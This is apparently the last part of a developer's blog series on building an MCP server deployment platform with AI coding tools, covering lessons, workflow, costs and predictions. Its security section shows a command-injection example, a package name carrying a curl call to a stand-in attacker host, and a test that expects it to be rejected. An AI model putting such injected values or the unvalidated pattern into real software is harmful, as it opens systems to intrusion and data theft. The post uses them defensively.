PART 7 OF 7

Lessons Learned - The AI Orchestrator's Handbook

December 27, 2025
15 min read

Part 7: Lessons Learned - The AI Orchestrator's Handbook

The Story So Far: In 2 weeks (Dec 11-23, 2025), I built a production MCP deployment platform entirely with AI orchestration. Zero lines manually coded. But what did I actually learn?

This is the handbook I wish I had on Day 1.

The Final Numbers

Before the lessons, let's quantify what AI orchestration achieved:

Quantitative Results

Time Investment: ~60 hours over 13 days

  • AI code generation: ~15 hours (25%)
  • Code review & validation: ~12 hours (20%)
  • Debugging infrastructure: ~18 hours (30%)
  • Testing and quality assurance: ~8 hours (13%)
  • Documentation: ~7 hours (12%)

Code Output:

  • Backend (Python): ~2,100 lines
  • Frontend (TypeScript): ~1,300 lines
  • Infrastructure (Docker, configs): ~200 lines
  • Tests: ~800 lines
  • Total: ~4,400 lines of production code

Documentation:

  • AI_ORCHESTRATION.md: 3,500 words
  • CONTRIBUTING.md: 800 words
  • AUTH_TROUBLESHOOTING.md: 600 words
  • SETUP.md: 600 words
  • DEPLOYMENT.md: 900 words
  • README.md: 1,200 words
  • Context files: ~5,000 words
  • Total: ~13,000 words (3x the code volume)

Quality Metrics:

  • Test coverage: 87%
  • Type safety: 100% (zero any types in TypeScript)
  • Linter compliance: 100% (passes ruff and eslint with zero warnings)
  • Security review: Passed multi-agent audit (4 AI reviewers)

Production Deployment:

  • Backend: https://catwalk-backend.fly.dev
  • PostgreSQL: Fly.io managed database ✅
  • Frontend: Vercel deployment ✅
  • End-to-end MCP tool calling: Works ✅

Manual Coding: 0 lines

  • Everything generated by AI
  • My role: architect, reviewer, debugger, validator

Estimated Time Savings vs Manual Coding: ~150 hours

  • Traditional estimate for this scope: ~200 hours
  • Actual time spent: ~60 hours
  • Savings: ~140 hours (70% reduction)

Qualitative Results

System Architecture: Comparable to senior engineer design

  • 3-layer architecture (Frontend → Backend → MCP Containers)
  • Proper separation of concerns
  • Security-first credential management
  • Production-grade error handling

Code Quality: Production-ready

  • Type-safe throughout
  • Comprehensive error handling
  • Extensive input validation
  • Secret masking and audit logging

Developer Experience: Smooth

  • Clear setup instructions
  • Robust error messages
  • Comprehensive troubleshooting guides
  • Active documentation

Proof of Concept: Validated

Where AI Excelled

1. Boilerplate and Patterns (95%+ AI Success Rate)

What AI nailed:

  • FastAPI endpoint scaffolding
  • SQLAlchemy model relationships
  • Pydantic validation schemas
  • React component structure
  • TypeScript type definitions
  • Alembic database migrations
  • Docker multi-stage builds
  • API client generation

Example: Dynamic form generation component

Prompt:

Create a FormBuilder component that:
- Takes AnalysisResult as input
- Generates form fields from env_vars array
- Uses password inputs for secrets
- Validates required fields
- Type-safe with TypeScript strict mode

AI delivered: ~150 lines of perfect TypeScript in under 5 minutes.

Why this worked: Form generation is a well-documented pattern in React. Massive training data.

2. Testing (90%+ AI Success Rate)

What AI generated perfectly:

  • Unit test structure (pytest, Vitest)
  • Mocking patterns (unittest.mock, vi.mock)
  • Integration test scenarios
  • Edge case coverage
  • Assertion logic

Example: Package validator tests

# Generated by Claude Code
@pytest.mark.asyncio
async def test_validate_package_npm_success():
    """Test successful npm package validation"""
    validator = PackageValidator()

    result = await validator.validate_package("@modelcontextprotocol/server-github")

    assert result["valid"] is True
    assert result["runtime"] == "npm"
    assert result["error"] is None

@pytest.mark.asyncio
async def test_validate_package_invalid():
    """Test invalid package name"""
    validator = PackageValidator()

    result = await validator.validate_package("definitely-not-a-real-package-xyz")

    assert result["valid"] is False
    assert result["runtime"] == "unknown"
    assert "not found" in result["error"]

51 tests generated. 90% worked first try. 10% needed minor mock adjustments.

Why this worked: Testing patterns are formulaic. AI has seen millions of test examples.

3. Documentation Structure (85%+ AI Success Rate)

What AI generated well:

  • README.md templates
  • API documentation (Swagger/OpenAPI)
  • Inline code comments
  • Setup instructions
  • Architecture diagrams (Mermaid markdown)

Example: SETUP.md generated from a simple prompt

Prompt: "Write SETUP.md with local development instructions for both backend and frontend"

AI delivered: Complete setup guide with:

  • Prerequisites
  • Step-by-step installation
  • Environment variable configuration
  • Running tests
  • Troubleshooting common issues

Why this worked: Documentation templates are abundant in open source projects.

4. Refactoring (80%+ AI Success Rate)

What AI did efficiently:

  • Extract functions into modules
  • Rename variables consistently
  • Update imports across files
  • Convert camelCase ↔ snake_case
  • Add type hints to existing code

Example: Extracted Zod schema generation from FormBuilder component

Prompt: "Extract Zod schema generation logic from FormBuilder.tsx into a dedicated utility file"

AI output:

  1. Created lib/generate-zod-schema.ts with extracted logic
  2. Updated FormBuilder.tsx to import the utility
  3. Updated all tests to use new utility
  4. Fixed all import paths

Time: ~2 minutes

Manual estimate: ~20 minutes (find all references, update imports, validate)

Why this worked: Refactoring is pattern matching. AI understands dependency graphs.

Where AI Struggled

1. Infrastructure-Specific Quirks (30% AI Success Rate)

What AI got wrong initially:

  • PostgreSQL driver selection (asyncpg vs psycopg3)
  • Fly.io SSL parameter handling
  • Docker CRLF line ending issues (Windows)
  • Environment variable timing (build vs runtime)
  • Fly.io Postgres cluster recovery

Example: The asyncpg disaster

AI's first suggestion:

# Use asyncpg for PostgreSQL
pip install asyncpg
DATABASE_URL = "postgresql+asyncpg://..."

The reality: asyncpg doesn't support Fly.io's sslmode parameter → crashes

The fix (manual):

# Use psycopg3 instead
pip install psycopg[binary]
DATABASE_URL = "postgresql+psycopg://..."

Why AI struggled: Fly.io-specific quirks aren't in training data. Infrastructure combinations (Fly.io + SQLAlchemy + SSL) are niche.

Lesson: Don't trust AI blindly on infrastructure. Validate in real environments.

2. Security Vulnerabilities (20% AI Success Rate)

What AI missed:

  • Command injection in package name handling
  • Credential leaks in API responses
  • Missing input validation
  • Race conditions in concurrent code
  • Lack of audit logging

Example: Command injection vulnerability

AI-generated code:

# VULNERABLE - no validation
package_name = user_input["package"]
env = {"MCP_PACKAGE": package_name}  # Injected into shell

The attack:

package_name = "@evil/pkg; curl http://attacker.com/steal"
# Shell executes: npx -y @evil/pkg; curl http://attacker.com/steal

Why AI missed this: AI generates happy paths. Security requires adversarial thinking.

Solution: Use multi-agent code review (CodeRabbit caught this)

3. Cross-System Integration (40% AI Success Rate)

What AI failed to connect:

  • NextAuth session → PostgreSQL user sync
  • JWT token creation → backend verification
  • Frontend auth flow → backend dependencies
  • Fly.io machine creation → backend proxying

Example: The user sync gap

AI generated:

  • NextAuth configuration ✅
  • JWT signing logic ✅
  • Backend auth middleware ✅

AI didn't generate:

  • The glue code that syncs users from NextAuth to PostgreSQL

Why this happened: Each piece exists in training data, but the integration between them is project-specific.

Lesson: AI generates components. You architect how they fit together.

4. Environment Configuration (10% AI Success Rate)

What AI couldn't validate:

  • Whether .env files have required secrets
  • If Fly.io secrets are set correctly
  • Secret value mismatches between environments
  • Timing issues (when env vars are loaded)

Example: AUTH_SECRET mismatch nightmare (Part 5)

AI generated: Code that uses process.env.AUTH_SECRET

AI didn't check:

  • Is this variable defined in .env.local?
  • Does it match the backend secret?
  • Is it set at build time or runtime?

Result: Days of debugging 401 errors

Why AI can't help: Environment state is invisible to AI. It only sees code.

Lesson: Manual environment validation is non-negotiable.

5. Debugging Production Issues (5% AI Success Rate)

What AI couldn't debug:

  • Fly.io Postgres "no active leader found" error
  • SSL certificate issues
  • Network connectivity between machines
  • Log interpretation

Example: PostgreSQL cluster failure

The error: no active leader found

AI's suggestion: "Try restarting the database"

The reality: Single-node cluster in unrecoverable state. Must destroy and recreate.

Why AI failed: Requires infrastructure knowledge (Fly.io Postgres architecture) + log interpretation + operational experience.

Lesson: Infrastructure debugging is still human work.

The Reproducible Methodology

Based on this journey, here's the step-by-step framework for AI-orchestrated development:

Phase 1: Foundation (Before Writing Code)

Step 1: Create Context Structure

Before a single line of code:

project/
├── AGENTS.md              # AI system prompt
├── context/
│   ├── ARCHITECTURE.md    # System design
│   ├── CURRENT_STATUS.md  # Living status doc
│   ├── TECH_STACK.md      # Every dependency + why
│   └── Project_Overview.md # Problem + solution

Step 2: Write Structured Prompts

Bad prompt: "Build an MCP deployment platform"

Good prompt:

Build a platform for deploying MCP servers to Fly.io.

REQUIREMENTS:
- GitHub repo analysis with Claude API
- Credential encryption (Fernet)
- Fly.io machine deployment
- MCP Streamable HTTP (2025-06-18 spec)

TECH STACK:
- Frontend: Next.js 15, React 19, TypeScript 5+ (strict mode)
- Backend: FastAPI, PostgreSQL + psycopg3, SQLAlchemy async
- Infrastructure: Fly.io Machines API, Docker

QUALITY:
- Zero TypeScript 'any' types
- Passes ruff (Python) / eslint (TypeScript) with zero warnings
- Comprehensive error handling
- Input validation with Pydantic

SECURITY:
- Validate all user input
- Mask secrets in API responses
- No shell injection risks
- Audit logging for sensitive actions

SUCCESS CRITERIA:
- End-to-end MCP tool calling works
- Production deployed on Fly.io
- 85%+ test coverage

Step 3: Multi-AI Cross-Validation

Feed the same prompt to:

  1. Claude Code
  2. ChatGPT-4
  3. Google Gemini

Compare architectures. Where they agree = good design. Where they disagree = complexity indicator.

Phase 2: Implementation (Code Generation)

Step 4: Phase-Based Development

Break project into explicit phases:

  • Phase 1: Database models + encryption
  • Phase 2: Analysis service
  • Phase 3: Deployment orchestration
  • Phase 4: Frontend UI
  • Phase 5: Production deployment

One phase per session. Don't let AI scope-creep.

Step 5: Generate Code with Constraints

Always include:

CONSTRAINTS:
- Type-safe (no 'any' in TypeScript, full hints in Python)
- Linter-compliant (must pass ruff/eslint)
- Error handling for all failure modes
- Tests for critical paths

Update CURRENT_STATUS.md when done.

Step 6: Immediate Validation

After each code generation:

# Backend
ruff check .
ruff format .
pytest

# Frontend
bun run typecheck
bun run lint
bun run test

Don't proceed until all checks pass.

Phase 3: Quality Control (Validation)

Step 7: Multi-Agent Code Review

Set up on GitHub (free for open source):

  • CodeRabbit (security)
  • Qodo (edge cases)
  • Gemini Code Assist (quality)
  • Greptile (integration)

Create PR for each phase. Let agents review.

Step 8: Fix Review Feedback

Feed agent comments back to AI:

CodeRabbit flagged command injection in deployment service.
Add package validation against npm/PyPI registries before deploying.

AI generates fixes. You validate.

Step 9: Test in Real Environments

Don't trust local development.

Deploy to staging (or production if you're brave):

  • Real database (not SQLite)
  • Real secrets management
  • Real network conditions
  • Real SSL/TLS

Catch environment issues early.

Phase 4: Documentation (Knowledge Capture)

Step 10: Document As You Go

After each debugging session:

  • Update CURRENT_STATUS.md (what works, what doesn't)
  • Update AGENTS.md if you learned new AI interaction patterns
  • Create troubleshooting docs for nasty bugs (like AUTH_TROUBLESHOOTING.md)

Step 11: Write for Future You

Assume you'll forget everything in 1 week.

Document:

  • Why you chose psycopg3 over asyncpg
  • How to recover from Fly.io Postgres failures
  • Which secrets must match across environments

Future you will thank past you.

Phase 5: Security Audit (Adversarial Review)

Step 12: Think Like an Attacker

AI generates happy paths. You must find malicious paths.

Ask:

  • What if user input contains shell metacharacters?
  • What if API key is compromised?
  • What if user submits 10,000 requests/second?
  • What if database connection fails mid-transaction?

Prompt AI for fixes:

Add input validation that rejects shell metacharacters.
Add rate limiting (100 req/min per IP).
Add transaction rollback on errors.

Step 13: Security Testing

Generate attack scenarios:

# Test command injection
malicious_package = "@evil/pkg; curl http://attacker.com"
response = await create_deployment({"package": malicious_package})
assert response.status_code == 400  # Must reject

If tests pass = exploit blocked. If tests fail = vulnerability found.

Phase 6: Production Hardening (Polish)

Step 14: Error Message Quality

Bad (AI default):

{"error": "Failed to create deployment"}

Good (prompt for better UX):

{
  "error": "invalid_package",
  "message": "Package '@evil/pkg; curl' not found in npm or PyPI",
  "help": "Verify the package name at https://npmjs.com",
  "docs": "https://docs.catwalk.live/troubleshooting#invalid-package"
}

Step 15: Observability

Add logging, metrics, and monitoring:

logger.info(f"Deployment {id} created by user {user.email}")
logger.warning(f"Package validation failed: {package_name}")
logger.error(f"Fly.io API error: {error}", extra={"deployment_id": id})

Production debugging without logs is impossible.

The Skill Shift

Old Role: Developer (Code Writer)

Primary skill: Writing syntactically correct code

Daily work:

  • Implementing functions line-by-line
  • Debugging syntax errors
  • Googling "how to X in language Y"
  • Stack Overflow for common patterns

Value: Lines of code produced

New Role: AI Orchestrator (System Architect)

Primary skill: Architecting systems and validating AI outputs

Daily work:

  • Designing system architecture
  • Writing structured prompts with constraints
  • Reviewing AI-generated code for logic errors
  • Debugging infrastructure and integration issues
  • Thinking adversarially about security
  • Documenting decisions and debugging paths

Value: System quality and velocity

What This Means for Your Career

Skills that INCREASE in value:

  1. System design - AI needs architectural direction
  2. Prompt engineering - Specificity = quality
  3. Code review - Validating AI outputs critically
  4. Debugging - Infrastructure, integration, environment
  5. Security thinking - Adversarial mindset
  6. Documentation - Making implicit knowledge explicit

Skills that DECREASE in value:

  1. Syntax memorization - AI knows every API
  2. Boilerplate writing - AI generates it instantly
  3. Pattern copying - AI has seen all patterns
  4. Manual refactoring - AI does it faster

The transition: From writing codevalidating systems

Analogy: Before trucks, moving rocks required strong backs. After trucks, it required knowing how to drive and where to deliver.

Common Pitfalls and How to Avoid Them

Pitfall 1: Blindly Trusting AI

Symptom: Merging AI-generated code without review

Risk: Security vulnerabilities, logic errors, integration failures

Solution:

  • Always run linters and tests
  • Review diffs manually
  • Think: "What could go wrong?"
  • Use multi-agent code review

Pitfall 2: Vague Prompts

Symptom: AI generates code that "kind of works" but has issues

Risk: Wasted time iterating, poor code quality

Solution:

  • Specific tech stack (Next.js 15, not just "React")
  • Explicit constraints (no 'any' types, must pass linter)
  • Success criteria (what does "done" look like?)

Pitfall 3: No External Memory

Symptom: AI "forgets" decisions across sessions, regenerates code you already rejected

Risk: Inconsistent architecture, wasted effort

Solution:

  • Create AGENTS.md and context/ structure
  • Update after each session
  • Start new sessions by loading context

Pitfall 4: Skipping Environment Validation

Symptom: Code works locally but fails in production

Risk: Deployment disasters, late-night debugging

Solution:

  • Test in production-like environments early
  • Validate secrets are set before deploying
  • Document environment setup explicitly

Pitfall 5: Ignoring Review Agents

Symptom: Security issues and quality problems slip through

Risk: Vulnerabilities in production, maintainability issues

Solution:

  • Set up CodeRabbit, Qodo, Gemini Code Assist, Greptile
  • Review all their comments
  • Feed feedback back to AI for fixes

The Economics of AI Orchestration

Costs

AI Services (my actual usage):

  • Claude Code (Anthropic CLI): $0 (included in Claude Pro subscription)
  • OpenRouter (analysis service): ~$2 (used Claude Haiku 4.5)
  • GitHub Copilot: Not used
  • ChatGPT Plus: $20/month (used for cross-validation)

Total AI costs: ~$22 for the project

Infrastructure:

  • Fly.io backend: ~$2/month (always-on shared-cpu)
  • PostgreSQL: $0 (free tier)
  • Vercel frontend: $0 (free tier)

Total infrastructure: ~$2/month

Time Investment: ~60 hours @ $100/hour freelance rate = $6,000 opportunity cost

Value Created

Code produced: ~4,400 lines production-ready

  • Traditional estimate: ~200 hours @ $100/hour = $20,000
  • AI-assisted actual: ~60 hours @ $100/hour = $6,000
  • Savings: $14,000 (70% time reduction)

Alternatives considered:

  • Hire developers: $10,000+ for this scope
  • Learn to code manually: 6+ months to reach this proficiency
  • Use no-code tools: Doesn't exist for this use case (MCP deployment)

ROI: 635x return on AI costs ($14,000 saved / $22 AI cost)

Intangible value:

  • Learned AI orchestration methodology (transferable skill)
  • Portfolio piece (open source project)
  • Documentation case study (blog series)
  • Validated production deployment (proof of concept)

The Future (My Predictions)

1-2 Years: AI Orchestration Becomes Standard

What changes:

  • "Junior developer" means "good at prompting AI"
  • Code review becomes "AI output review"
  • 10x productivity gains become normal
  • Solo founders ship enterprise-scale products

What doesn't change:

  • System architecture still requires humans
  • Security thinking still requires humans
  • Product decisions still require humans
  • Debugging infrastructure still requires humans

3-5 Years: AI Handles More of the Stack

Speculation:

  • AI debugs infrastructure (interprets logs, fixes config)
  • AI performs security audits automatically
  • AI handles deployment and rollbacks
  • AI writes documentation from code changes

What humans do:

  • Define product vision
  • Make trade-off decisions
  • Validate system behavior
  • Handle novel problems (edge cases AI hasn't seen)

10+ Years: Unknown

Possibilities:

  • AI handles full system design
  • Human role becomes "product vision" only
  • Or: We discover new bottlenecks AI can't solve
  • Or: Human oversight remains critical for safety

What I believe: The orchestration skill (getting AI to build what you envision) will remain valuable indefinitely.

Your Action Plan

Want to replicate this methodology? Here's your Week 1:

Day 1: Setup

  • Sign up for Claude Code (or Cursor, or Copilot)
  • Create a project with AGENTS.md and context/ structure
  • Install linters (ruff for Python, eslint for TypeScript)

Day 2: Practice Prompting

  • Choose a simple project (e.g., "Build a todo API")
  • Write a structured prompt with constraints
  • Generate code, run linters, iterate

Day 3: Review and Validate

  • Set up CodeRabbit on GitHub (free for open source)
  • Create PR with AI-generated code
  • Review agent feedback, feed back to AI

Day 4: Infrastructure Deploy

  • Deploy to real environment (Fly.io, Vercel, Railway)
  • Encounter environment issues
  • Document solutions

Day 5: Security Thinking

  • Try to break your own system
  • Generate attack scenarios as tests
  • Prompt AI to fix vulnerabilities

Day 6: Documentation

  • Write troubleshooting guide
  • Update AGENTS.md with learnings
  • Create README for future you

Day 7: Reflect

  • What did AI do well?
  • What required manual intervention?
  • How would you do it differently next time?

Repeat this cycle. Each iteration, you'll get faster and more effective.

Final Thoughts

Can AI build production systems?

Yes - with heavy human orchestration.

AI is not a replacement for developers. It's a power tool that amplifies human architects.

The skill isn't coding anymore. It's:

  • Architecting systems worth building
  • Prompting AI with precision
  • Validating outputs critically
  • Debugging the real world
  • Making trade-offs under uncertainty

This is the new craft.

And honestly? I love it.

I get to focus on problems I care about (MCP deployment UX, credential security, system architecture) instead of fighting syntax errors and writing boilerplate.

AI handles the tedious. I handle the interesting.

That's the future I want to build in.


Acknowledgments

Built with:

  • Claude Code (Anthropic) - Primary implementation
  • Cursor - Refactoring and iteration (mentioned in docs)
  • Google Gemini - Planning and cross-validation
  • ChatGPT-4 - Architecture validation

Reviewed by:

  • CodeRabbit - Security analysis
  • Qodo - Edge case detection
  • Gemini Code Assist - Code quality
  • Greptile - Integration checks

Inspired by:

  • Vercel's developer experience
  • The MCP ecosystem
  • The AI orchestration community
  • Every developer frustrated with infrastructure complexity

Special thanks to you, the reader, for making it through all 7 parts. If this series helped you, pay it forward - share the methodology.


Where to Go From Here

Explore the codebase:

Try it yourself:

  • Fork the repo
  • Deploy to Fly.io
  • Contribute improvements
  • Document your own AI orchestration journey

Connect:

  • Questions? Open a GitHub issue
  • Built something similar? Share in discussions
  • Want to hire an AI orchestrator? Email: jordanlive121@gmail.com

Read the other parts:


This is the end of the series. But it's just the beginning of AI-orchestrated development.

Your turn. Build something.


Series: Building Catwalk Live with AI Orchestration (Complete) Author: Jordan Hindo (AI Orchestrator, Technical Product Builder) Project: https://github.com/zenchantlive/catwalk License: MIT Published: December 2025

All 7 parts written, researched, and structured - documenting a real journey from initial commit to production deployment, entirely through AI orchestration.


JH

Jordan Hindo

Full-stack Developer & AI Engineer building in public. Exploring the future of agentic coding and AI-generated assets.

Get in touch